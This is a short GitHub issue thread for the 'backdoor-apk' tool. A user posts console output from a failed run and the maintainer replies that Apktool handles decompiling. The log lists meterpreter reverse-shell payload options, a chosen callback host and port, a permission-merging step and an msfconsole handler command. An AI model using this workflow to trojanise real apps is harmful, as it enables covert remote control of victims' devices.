### ISSUE TITLE
Failed to compiled .

### ISSUE THREAD

**Issue by ProXpert89** [dana-at-cp/backdoor-apk#174]
> [*] Running backdoor-apk.sh v0.2.4a on Fri Jul 19 11:36:23 +08 2019
[+] Android payload options:
1) meterpreter/reverse_http   3) meterpreter/reverse_tcp    5) shell/reverse_https
2) meterpreter/reverse_https  4) shell/reverse_http         6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: xx.xx.xx.xxx
[?] Please enter an LPORT value: 443
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[!] Failed to decompile original APK file

any idea ?
>

**Comment by dana-at-cp** [comment]
Apktool is used to decompile/recompile APK files.
